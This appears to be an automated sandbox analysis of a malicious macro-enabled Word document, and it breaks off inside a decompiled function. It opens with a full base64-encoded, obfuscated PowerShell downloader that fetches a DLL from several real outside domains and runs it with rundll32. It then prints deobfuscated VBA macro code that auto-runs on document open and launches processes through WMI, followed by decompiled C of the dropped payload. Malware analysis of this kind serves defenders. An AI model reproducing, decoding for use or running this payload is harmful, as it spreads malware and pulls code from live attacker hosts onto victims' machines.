IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkAbgBjACcAKwAnAGwAJwArACcAdQAnACkAKwAoACcAZABlAHMAJwArACcALwBKAEQAOAAnACsAJwAvAEAAXQAnACkAKwAoACcAYQBuACcAKwAnAHcAJwApACsAKAAnAFsAMwA6ACcAKwAnAC8AJwApACsAJwAvAHMAJwArACcAZQAnACsAKAAnAG8AJwArACcALgB1AGQAJwApACsAKAAnAGEAaQBwACcAKwAnAHUAcgBrAGEAcgAnACsAJwB0AC4AYwAnACkAKwAnAG8AJwArACgAJwBtAC8AcgB4AC0AJwArACcANQAnACsAJwA3ADAAMAAnACkAKwAnAC0ANgAnACsAKAAnAGgAbgByADcALwBTACcAKwAnAGcAbQBzACcAKwAnAC8AQAAnACkAKwAoACcAXQBhAG4AdwAnACsAJwBbADMAJwArACcAOgAvACcAKQArACcALwBwACcAKwAnAGgAdQAnACsAKAAnAG8AbgAnACsAJwBnACcAKQArACcAYQBwACcAKwAoACcAcAAnACsAJwBsAGUAJwApACsAKAAnAC4AYwAnACsAJwBvAG0ALwAnACsAJwBtAGUAcwBzACcAKQArACcAZQAnACsAJwBuAGcAJwArACgAJwBlACcAKwAnAHIALQAnACkAKwAnAHMAbwAnACsAKAAnAHUAbgAnACsAJwBkACcAKQArACcALQA4ACcAKwAnAGsAdwAnACsAJwBrAHEAJwArACcALwBZACcAKwAoACcARgByADcALwBAACcAKwAnAF0AYQBuAHcAJwArACcAWwAnACkAKwAoACcAMwBzADoALwAvACcAKwAnAGIAJwApACsAKAAnAHIAJwArACcAZQB0ACcAKQArACcAdABzACcAKwAnAGgAYQAnACsAKAAnAHcAbQBhAGcAaQBjACcAKwAnAC4AYwBvAG0AJwArACcALwBjAG8AJwApACsAKAAnAG4AdABlACcAKwAnAG4AdAAnACkAKwAoACcALwBZAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwAnACsAJwBbADMAcwA6AC8ALwBjACcAKwAnAGEAJwArACcAZgBlAGMAZQBuACcAKwAnAHQAcgBh

                                        Ty8salh27qds_

                                        dwJWfYEzQ

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        vkAhEABKZ

                                        Close

                                        LXJdHABRP

                                        StringsDecrypted Strings
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "MRDYFoGGc:\LGsvZeCE\WxUJACHB.KjAkiD"
                                        "MJtNyEaooLCJCF"
                                        "UqiKuFLuUFAG"
                                        "zErBUYAGeMPaGBPDC"
                                        "]a""nw[3"
                                        "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                        "gDyoIzGDe:\zHPnE\SlHrCGBaB.xpVdXbCuJ"
                                        "aekFkFuGVeluWCH"
                                        "qsYNSviAFUkyhFd"
                                        "rWCJIFDWVfATR"
                                        LineInstructionMeta Information
                                        263

                                        Function Zacj6cs0xxmkchq(Sagq26te2gujbyg)

                                        264

                                        Pn8s1r_n_tq7o5093 = Leedy8frqauxr

                                        Leedy8frqauxr

                                        executed
                                        265

                                        Goto RJCEFJhC

                                        266

                                        Dim WcDDCTDnI as Object

                                        267

                                        Set LqqhhpAQ = bzYfQcEHB

                                        bzYfQcEHB

                                        268

                                        Set WcDDCTDnI = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        269

                                        Dim RJCEFJhC as Object

                                        270

                                        Set RJCEFJhC = WcDDCTDnI.CreateTextFile("MRDYFoGGc:\LGsvZeCE\WxUJACHB.KjAkiD")

                                        CreateTextFile

                                        271

                                        RJCEFJhC.WriteLine "MJtNyEaooLCJCF"

                                        WriteLine

                                        272

                                        RJCEFJhC.WriteLine "UqiKuFLuUFAG"

                                        WriteLine

                                        273

                                        RJCEFJhC.WriteLine "zErBUYAGeMPaGBPDC"

                                        WriteLine

                                        274

                                        Set oTwTJAJ = xZGeAsHP

                                        xZGeAsHP

                                        275

                                        RJCEFJhC.Close

                                        Close

                                        276

                                        Set WcDDCTDnI = Nothing

                                        277

                                        Set sHovtYJn = naqcFCA

                                        naqcFCA

                                        278

                                        Set RJCEFJhC = Nothing

                                        278

                                        RJCEFJhC:

                                        280

                                        Zacj6cs0xxmkchq = Replace(Sagq26te2gujbyg, "]a" + "nw[3", Ty8salh27qds_)

                                        Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process

                                        Ty8salh27qds_

                                        executed
                                        281

                                        Goto ZYnQf

                                        282

                                        Dim GUUgA as Object

                                        283

                                        Set PRsSHBf = dwJWfYEzQ

                                        dwJWfYEzQ

                                        284

                                        Set GUUgA = CreateObject(Slz39ct0lz_ksnd("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                        CreateObject

                                        285

                                        Dim ZYnQf as Object

                                        286

                                        Set ZYnQf = GUUgA.CreateTextFile("gDyoIzGDe:\zHPnE\SlHrCGBaB.xpVdXbCuJ")

                                        CreateTextFile

                                        287

                                        ZYnQf.WriteLine "aekFkFuGVeluWCH"

                                        WriteLine

                                        288

                                        ZYnQf.WriteLine "qsYNSviAFUkyhFd"

                                        WriteLine

                                        289

                                        ZYnQf.WriteLine "rWCJIFDWVfATR"

                                        WriteLine

                                        290

                                        Set XJUEA = vkAhEABKZ

                                        vkAhEABKZ

                                        291

                                        ZYnQf.Close

                                        Close

                                        292

                                        Set GUUgA = Nothing

                                        293

                                        Set EjrLDNGq = LXJdHABRP

                                        LXJdHABRP

                                        294

                                        Set ZYnQf = Nothing

                                        294

                                        ZYnQf:

                                        296

                                        End Function

                                        Module: Larj61e5m5vzwh77

                                        Declaration
                                        LineContent
                                        1

                                        Attribute VB_Name = "Larj61e5m5vzwh77"

                                        Module: Teh9tkv0p83u4g

                                        Declaration
                                        LineContent
                                        1

                                        Attribute VB_Name = "Teh9tkv0p83u4g"

                                        2

                                        Attribute VB_Base = "1Normal.ThisDocument"

                                        3

                                        Attribute VB_GlobalNameSpace = False

                                        4

                                        Attribute VB_Creatable = False

                                        5

                                        Attribute VB_PredeclaredId = True

                                        6

                                        Attribute VB_Exposed = True

                                        7

                                        Attribute VB_TemplateDerived = True

                                        8

                                        Attribute VB_Customizable = True

                                        Executed Functions
                                        Subroutine Document_open, APIs: 120, Strings: 0, Number of lines: 3, Relevance: 181.503
                                        APIsMeta Information

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Xj1p0_yor4q8g

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Item

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Gdmbhv991jtvgzq

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: hlEyDCTAH

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: eHrGyvyM

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: cVkLD

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: tIaWTAJA

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: PvcTcFOF

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: chutdOAFs

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: XhUYUbSBA

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: pzqeBGIAH

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: TbHJC

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: eBvGf

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: bYwGEijH

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: uvgvJGfI

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Mid

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Name

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Application

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: rINmB

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: iOplaUSwB

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: kUseBAG

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: qdDeFbDk

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: UbNkCZ

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: fMPBmQ

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: sbLwDeWJ

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: JjBKEUXqH

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: GEopA

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: BuEcDJvc

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: JkICEEJbA

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: hrqzdCF

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Mid

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Len

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: SYgbDdCEH

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: IuDSasFIm

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: LUJoKCCQ

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: xDUMl

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: TFPJDBSa

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: hKDFekFGF

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Create

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: L_4bpvggv2vokj75

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Nakuayuxnnrg5

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: IYlnG

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: nEFlbEa

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: ClgfEDCg

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: UcUhFvH

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: ncXeGEGfF

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: Close

                                        Part of subcall function Rvpv59xrvp7m2wb@A81c_pcot0t3c8: kIALACE

                                        LineInstructionMeta Information
                                        9

                                        Private Sub Document_open()

                                        10

                                        Rvpv59xrvp7m2wb

                                        executed
                                        11

                                        End Sub

                                        Reset < >

                                          Analysis Process: powershell.exe PID: 2544 Parent PID: 1976 powershell.exeCOMMON

                                          Executed Functions

                                          Function 000007FF00252505, Relevance: .3, Instructions: 287COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2101081354.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3159b56ee96a83b47551ce1e64fce265b3b8c5cb1ee71831d339ab84b9cdacf6
                                          • Instruction ID: b7dc6a4da6378cb8d6465de2a0adc6e74d62de6161e021fa59abceacf53281f9
                                          • Opcode Fuzzy Hash: 3159b56ee96a83b47551ce1e64fce265b3b8c5cb1ee71831d339ab84b9cdacf6
                                          • Instruction Fuzzy Hash: 22518E5291EBC65FE7075B389C656A07FB0EF27211F4A40E7D088CB0E3E95C9959C362
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Analysis Process: rundll32.exe PID: 2892 Parent PID: 1616 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 006C2C63, Relevance: 54.9, Strings: 43, Instructions: 1125COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 97%
                                          			E006C2C63() {
				char _v68;
				signed int _v72;
				char _v80;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _v112;
				signed int _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v144;
				signed int _v148;
				void* _v152;
				void* _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				unsigned int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				unsigned int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				unsigned int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				unsigned int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				unsigned int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				signed int _v592;
				unsigned int _v596;
				signed int _v600;
				signed int _t1135;
				signed int _t1138;
				signed int _t1140;
				signed int _t1144;
				signed int _t1172;
				void* _t1186;
				signed int _t1199;
